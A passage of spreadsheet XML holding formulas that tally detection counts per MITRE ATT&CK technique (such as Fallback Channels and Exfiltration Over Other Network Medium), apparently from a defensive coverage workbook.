        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU4" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV4" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY4" s="322" t="str">
        <f t="shared" ref="AY4:AY67" si="7">AX4 &amp; " (" &amp; AW4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AZ4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA4" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB4" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC4" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>3</v>
      </c>
      <c r="BD4" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>2</v>
      </c>
      <c r="BE4" s="4" t="str">
        <f t="shared" ref="BE4:BE67" si="8">BD4 &amp; " (" &amp; BC4 &amp; ")"</f>
        <v>2 (3)</v>
      </c>
      <c r="BF4" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>2</v>
      </c>
      <c r="BG4" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH4" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI4" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ4" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK4" s="322" t="str">
        <f t="shared" ref="BK4:BK67" si="9">BJ4 &amp; " (" &amp; BI4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BL4" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM4" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN4" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO4" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>3</v>
      </c>
      <c r="BP4" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>3</v>
      </c>
      <c r="BQ4" s="4" t="str">
        <f t="shared" ref="BQ4:BQ67" si="10">BP4 &amp; " (" &amp; BO4 &amp; ")"</f>
        <v>3 (3)</v>
      </c>
      <c r="BR4" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS4" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>3</v>
      </c>
      <c r="BT4" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU4" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>3</v>
      </c>
      <c r="BV4" s="292">
        <v>0</v>
      </c>
      <c r="BW4" s="322">
        <v>0</v>
      </c>
      <c r="BX4" s="4" t="str">
        <f t="shared" ref="BX4:BX67" si="11">BW4 &amp; " (" &amp; BV4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BY4" s="12">
        <v>0</v>
      </c>
      <c r="BZ4" s="13">
        <v>0</v>
      </c>
      <c r="CA4" s="394">
        <v>0</v>
      </c>
      <c r="CB4" s="288">
        <v>0</v>
      </c>
      <c r="CC4" s="4">
        <v>0</v>
      </c>
      <c r="CD4" s="4" t="str">
        <f t="shared" ref="CD4:CD67" si="12">CC4 &amp; " (" &amp; CB4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="CE4" s="4">
        <v>0</v>
      </c>
      <c r="CF4" s="4">
        <v>0</v>
      </c>
      <c r="CG4" s="13">
        <v>0</v>
      </c>
      <c r="CH4" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:93" ht="15" customHeight="1">
      <c r="A5" s="4">
        <f t="shared" ref="A5:A68" si="13">A4+1</f>
        <v>3</v>
      </c>
      <c r="B5" s="4" t="str">
        <f>IFERROR(VLOOKUP(A5,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1008</v>
      </c>
      <c r="C5" s="493" t="str">
        <f>IFERROR(VLOOKUP(B5,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Fallback Channels</v>
      </c>
      <c r="D5" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B5)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E5" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>6</v>
      </c>
      <c r="F5" s="579" t="str">
        <f t="shared" ref="F5:F68" si="14">D5&amp;" ("&amp;E5&amp;")"</f>
        <v>1 (6)</v>
      </c>
      <c r="G5" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>15</v>
      </c>
      <c r="H5" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I5" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (15)</v>
      </c>
      <c r="J5" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K5" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L5" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M5" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>17</v>
      </c>
      <c r="N5" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>7</v>
      </c>
      <c r="O5" s="322" t="str">
        <f t="shared" si="1"/>
        <v>7 (17)</v>
      </c>
      <c r="P5" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>4</v>
      </c>
      <c r="Q5" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R5" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>3</v>
      </c>
      <c r="S5" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>32</v>
      </c>
      <c r="T5" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>8</v>
      </c>
      <c r="U5" s="4" t="str">
        <f t="shared" si="2"/>
        <v>8 (32)</v>
      </c>
      <c r="V5" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="W5" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X5" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>3</v>
      </c>
      <c r="Y5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>99</v>
      </c>
      <c r="Z5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>4</v>
      </c>
      <c r="AA5" s="322" t="str">
        <f t="shared" si="3"/>
        <v>4 (99)</v>
      </c>
      <c r="AB5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="AC5" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD5" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>3</v>
      </c>
      <c r="AE5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>57</v>
      </c>
      <c r="AF5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>28</v>
      </c>
      <c r="AG5" s="322" t="str">
        <f t="shared" si="4"/>
        <v>28 (57)</v>
      </c>
      <c r="AH5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>22</v>
      </c>
      <c r="AI5" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ5" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>5</v>
      </c>
      <c r="AK5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>156</v>
      </c>
      <c r="AL5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>32</v>
      </c>
      <c r="AM5" s="322" t="str">
        <f t="shared" si="5"/>
        <v>32 (156)</v>
      </c>
      <c r="AN5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>25</v>
      </c>
      <c r="AO5" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP5" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>5</v>
      </c>
      <c r="AQ5" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR5" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS5" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT5" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU5" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV5" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY5" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ5" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA5" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB5" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC5" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>32</v>
      </c>
      <c r="BD5" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>8</v>
      </c>
      <c r="BE5" s="4" t="str">
        <f t="shared" si="8"/>
        <v>8 (32)</v>
      </c>
      <c r="BF5" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>5</v>
      </c>
      <c r="BG5" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH5" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>3</v>
      </c>
      <c r="BI5" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>6</v>
      </c>
      <c r="BJ5" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>4</v>
      </c>
      <c r="BK5" s="322" t="str">
        <f t="shared" si="9"/>
        <v>4 (6)</v>
      </c>
      <c r="BL5" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM5" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN5" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO5" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>17</v>
      </c>
      <c r="BP5" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>12</v>
      </c>
      <c r="BQ5" s="4" t="str">
        <f t="shared" si="10"/>
        <v>12 (17)</v>
      </c>
      <c r="BR5" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS5" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>6</v>
      </c>
      <c r="BT5" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU5" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>5</v>
      </c>
      <c r="BV5" s="292">
        <v>11</v>
      </c>
      <c r="BW5" s="322">
        <v>5</v>
      </c>
      <c r="BX5" s="4" t="str">
        <f t="shared" si="11"/>
        <v>5 (11)</v>
      </c>
      <c r="BY5" s="12">
        <v>3</v>
      </c>
      <c r="BZ5" s="13">
        <v>1</v>
      </c>
      <c r="CA5" s="394">
        <v>3</v>
      </c>
      <c r="CB5" s="288">
        <v>22</v>
      </c>
      <c r="CC5" s="4">
        <v>8</v>
      </c>
      <c r="CD5" s="4" t="str">
        <f t="shared" si="12"/>
        <v>8 (22)</v>
      </c>
      <c r="CE5" s="4">
        <v>3</v>
      </c>
      <c r="CF5" s="4">
        <v>2</v>
      </c>
      <c r="CG5" s="13">
        <v>1</v>
      </c>
      <c r="CH5" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:93" ht="15" customHeight="1">
      <c r="A6" s="4">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="B6" s="4" t="str">
        <f>IFERROR(VLOOKUP(A6,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1011</v>
      </c>
      <c r="C6" s="493" t="str">
        <f>IFERROR(VLOOKUP(B6,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Other Network Medium</v>
      </c>
      <c r="D6" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B6)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E6" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F6" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G6" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>1</v>
      </c>
      <c r="H6" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I6" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J6" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K6" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L6" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M6" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N6" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O6" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P6" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q6" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R6" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S6" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>1</v>
      </c>
      <c r="T6" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>1</v>
      </c>
      <c r="U6" s="4" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V6" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W6" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X6" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>1</v>
      </c>
      <c r="Z6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>1</v>
      </c>
      <c r="AA6" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC6" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD6" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>4</v>
      </c>
      <c r="AF6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>2</v>
      </c>
      <c r="AG6" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI6" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ6" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>5</v>
      </c>
      <c r="AL6" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B6,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>3</v>
      </c>
      <c r="AM6" s="322" t="str">
        <f t="shared" si="5"/>
